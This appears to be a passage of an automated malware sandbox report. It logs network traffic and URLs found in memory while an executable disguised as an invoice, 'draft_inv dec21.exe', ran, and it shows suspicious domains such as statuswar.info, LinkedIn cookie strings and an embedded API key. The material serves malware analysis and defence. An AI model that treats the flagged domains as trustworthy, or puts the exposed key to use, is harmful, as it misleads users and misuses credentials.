Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 01 Dec 2021 09:34:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 01 Dec 2021 09:34:25 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Dec 2021 09:35:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeSet-Cookie: security_session_verify=eacd4aa794019e81ab3f3becff0d4bcf; expires=Sat, 04-Dec-21 17:35:46 GMT; path=/; HttpOnlyData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 01 Dec 2021 09:37:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be735-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 01 Dec 2021 09:39:17 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Dec 2021 09:39:56 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: svchost.exe, 0000000B.00000002.11095566235.0000000004D32000.00000004.00020000.sdmp String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: svchost.exe, 0000000B.00000002.11095566235.0000000004D32000.00000004.00020000.sdmp String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: svchost.exe, 0000000B.00000002.11095566235.0000000004D32000.00000004.00020000.sdmp String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp String found in binary or memory: http://181ue.com/sq.html?entry=
Source: draft_inv dec21.exe, 00000008.00000003.6723833827.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6725673470.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726515151.000000000089F000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726184531.0000000000896000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6920864857.00000000008A2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6724195797.00000000008A3000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: draft_inv dec21.exe, 00000008.00000003.6723833827.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6725673470.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726515151.000000000089F000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726184531.0000000000896000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6920864857.00000000008A2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6724195797.00000000008A3000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000A.00000000.7095220223.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6812895943.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6860287928.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6763636920.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digi
Source: explorer.exe, 0000000A.00000000.6762309173.000000000DD29000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7093850961.000000000DD29000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6859178062.000000000DD29000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6811980327.000000000DD29000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 0000000A.00000000.7095220223.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6812895943.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6860287928.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6763636920.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 0000000A.00000000.6769023376.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866481600.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818418295.0000000011483000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866798303.00000000114C0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6769282903.00000000114C0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818714689.00000000114C0000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 0000000A.00000000.6850853985.000000000AAF0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6849380205.0000000009F70000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6736651526.00000000033E0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.micro
Source: UserOOBEBroker.exe, 00000003.00000002.11083878638.000002278EAB0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.microso
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000000A.00000000.6746304267.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6845108468.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6796864976.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078024608.000000000993A000.00000004.00000001.sdmp String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 0000000A.00000000.6845627993.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6746869625.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6797467749.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078654239.00000000099AD000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000000.7090429730.000000000D913000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000000.6810627291.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6857788973.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6760638241.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7092262614.000000000DBDD000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7077199847.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6844291725.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6745620416.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6796095372.0000000009896000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: explorer.exe, 0000000A.00000000.7087565531.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6755416072.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6806548919.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6853693363.000000000D6B0000.00000004.00000001.sdmp String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: explorer.exe, 0000000A.00000000.7087565531.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6755416072.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6806548919.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6853693363.000000000D6B0000.00000004.00000001.sdmp String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation8
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp String found in binary or memory: https://excel.office.comv
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6769343918.00000000114CB000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866893237.00000000114CB000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818792515.00000000114CB000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: svchost.exe, 0000000B.00000002.11088928256.00000000034A6000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: svchost.exe, 0000000B.00000002.11088928256.00000000034A6000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: svchost.exe, 0000000B.00000002.11088928256.00000000034A6000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: explorer.exe, 0000000A.00000000.6769023376.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866481600.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818418295.0000000011483000.00000004.00000001.sdmp String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp String found in binary or memory: https://outlook.comUser6
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp String found in binary or memory: https://powerpoint.office.comEM8
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp String found in binary or memory: https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=
Source: draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/
Source: draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp String found in binary or memory: https://statuswar.info/1
